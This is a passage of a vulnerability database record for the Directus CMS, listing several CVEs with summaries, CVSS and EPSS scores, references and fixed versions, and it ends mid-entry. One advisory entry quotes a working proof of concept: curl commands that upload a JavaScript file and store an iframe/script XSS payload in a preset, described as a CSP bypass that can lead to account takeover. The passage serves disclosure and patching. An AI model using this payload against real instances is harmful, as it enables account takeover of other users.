scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m
fixed_packages
0
url pkg:npm/directus@10.13.3
purl pkg:npm/directus@10.13.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3
1
url pkg:npm/directus@11.0.0-rc.1
purl pkg:npm/directus@11.0.0-rc.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-m3wb-sstx-v3d6
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-wgag-36wa-qyay
3
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1
2
url pkg:npm/directus@11.1.0
purl pkg:npm/directus@11.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-w1ph-v2n1-nbby
4
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0
aliases CVE-2024-46990, GHSA-68g8-c275-xf2m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-msb5-197k-a3er
14
url VCID-p7d9-91j7-dbab
vulnerability_id VCID-p7d9-91j7-dbab
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ "media_live_embeds": false }` to the _Options Overrides_ option of the Rich Text HTML interface.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-24814
reference_id
reference_type
scores
0
value 0.0043
scoring_system epss
scoring_elements 0.62814
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-24814
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/pull/12020
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/pull/12020
3
reference_url https://github.com/directus/directus/releases/tag/v9.7.0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/releases/tag/v9.7.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-24814
reference_id CVE-2022-24814
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-24814
5
reference_url https://github.com/advisories/GHSA-xmjj-3c76-5w84
reference_id GHSA-xmjj-3c76-5w84
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xmjj-3c76-5w84
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84
reference_id GHSA-xmjj-3c76-5w84
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-24814, GHSA-xmjj-3c76-5w84
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p7d9-91j7-dbab
15
url VCID-szny-2sbf-v7de
vulnerability_id VCID-szny-2sbf-v7de
summary Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-26492
reference_id
reference_type
scores
0
value 0.0023
scoring_system epss
scoring_elements 0.45796
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-26492
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff
3
reference_url https://github.com/directus/directus/releases/tag/v9.23.0
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/releases/tag/v9.23.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-26492
reference_id CVE-2023-26492
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-26492
5
reference_url https://github.com/advisories/GHSA-j3rg-3rgm-537h
reference_id GHSA-j3rg-3rgm-537h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j3rg-3rgm-537h
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
reference_id GHSA-j3rg-3rgm-537h
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
fixed_packages
0
url pkg:npm/directus@9.23.0
purl pkg:npm/directus@9.23.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jmem-8d4q-x7br
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0
1
url pkg:npm/directus@9.23.1
purl pkg:npm/directus@9.23.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-jmem-8d4q-x7br
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-wgag-36wa-qyay
12
vulnerability VCID-xc7t-gwaz-ckeu
13
vulnerability VCID-xt9c-32g5-mqes
14
vulnerability VCID-yutw-33sk-5fg3
15
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1
aliases CVE-2023-26492, GHSA-j3rg-3rgm-537h
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-szny-2sbf-v7de
16
url VCID-v4vz-smcx-gygb
vulnerability_id VCID-v4vz-smcx-gygb
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL is vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-27474
reference_id
reference_type
scores
0
value 0.00828
scoring_system epss
scoring_elements 0.74823
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-27474
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/issues/17119
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/issues/17119
3
reference_url https://github.com/directus/directus/pull/17120
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/pull/17120
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-27474
reference_id CVE-2023-27474
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-27474
5
reference_url https://github.com/advisories/GHSA-4hmq-ggrm-qfc6
reference_id GHSA-4hmq-ggrm-qfc6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4hmq-ggrm-qfc6
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6
reference_id GHSA-4hmq-ggrm-qfc6
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/
url https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6
fixed_packages
0
url pkg:npm/directus@9.23.0
purl pkg:npm/directus@9.23.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jmem-8d4q-x7br
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0
1
url pkg:npm/directus@9.23.1
purl pkg:npm/directus@9.23.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-jmem-8d4q-x7br
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-wgag-36wa-qyay
12
vulnerability VCID-xc7t-gwaz-ckeu
13
vulnerability VCID-xt9c-32g5-mqes
14
vulnerability VCID-yutw-33sk-5fg3
15
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1
aliases CVE-2023-27474, GHSA-4hmq-ggrm-qfc6
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v4vz-smcx-gygb
17
url VCID-wgag-36wa-qyay
vulnerability_id VCID-wgag-36wa-qyay
summary 
Directus has a DOM-Based cross-site scripting (XSS) via layout_options
### Impact
Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.

### PoC
To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

1. Upload the following JavaScript file.

Using the upload functionality at `POST /files`. This PoC will show an alert message.

```js
export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")
```

2. Create a preset for a collection and store the preset ID.

Or use a preset already created from GET /presets. The following example uses the direct_users preset.

```
attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
```

When the user visits the view that uses the directus_users preset, the JavaScript file will be executed.

Notes:

Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`.

We can target any collection that uses the vulnerable template structure that renders the layout option section.

In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.
references
0
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 3.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
1
reference_url https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw
reference_id
reference_type
scores
0
value 3.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw
2
reference_url https://github.com/advisories/GHSA-9qrm-48qf-r2rw
reference_id GHSA-9qrm-48qf-r2rw
reference_type
scores
url https://github.com/advisories/GHSA-9qrm-48qf-r2rw
fixed_packages
0
url pkg:npm/directus@11.3.3
purl pkg:npm/directus@11.3.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3
aliases GHSA-9qrm-48qf-r2rw
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wgag-36wa-qyay
18
url VCID-xt9c-32g5-mqes
vulnerability_id VCID-xt9c-32g5-mqes
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-45596
reference_id
reference_type
scores
0
value 0.00753
scoring_system epss
scoring_elements 0.73508
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-45596
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
3
reference_url https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
4
reference_url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
5
reference_url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-45596
reference_id CVE-2024-45596
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-45596
7
reference_url https://github.com/advisories/GHSA-cff8-x7jv-4fm8
reference_id GHSA-cff8-x7jv-4fm8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cff8-x7jv-4fm8
8
reference_url https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8
reference_id GHSA-cff8-x7jv-4fm8
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/
url https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8
fixed_packages
0
url pkg:npm/directus@10.13.3
purl pkg:npm/directus@10.13.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3
1
url pkg:npm/directus@11.1.0
purl pkg:npm/directus@11.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-w1ph-v2n1-nbby
4
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0
aliases CVE-2024-45596, GHSA-cff8-x7jv-4fm8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xt9c-32g5-mqes
19
url VCID-yutw-33sk-5fg3
vulnerability_id VCID-yutw-33sk-5fg3
summary Duplicate Advisory: Improper access control in Directus
references
0
reference_url https://directus.io
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://directus.io
1
reference_url https://fluidattacks.com/advisories/capaldi
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://fluidattacks.com/advisories/capaldi
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
reference_id CVE-2024-6534
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
4
reference_url https://github.com/advisories/GHSA-q83v-hq3j-4pq3
reference_id GHSA-q83v-hq3j-4pq3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q83v-hq3j-4pq3
fixed_packages
0
url pkg:npm/directus@10.13.1
purl pkg:npm/directus@10.13.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1
aliases GHSA-q83v-hq3j-4pq3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yutw-33sk-5fg3
20
url VCID-yz34-qwam-wbcn
vulnerability_id VCID-yz34-qwam-wbcn
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-36128
reference_id
reference_type
scores
0
value 0.00353
scoring_system epss
scoring_elements 0.57894
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-36128
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
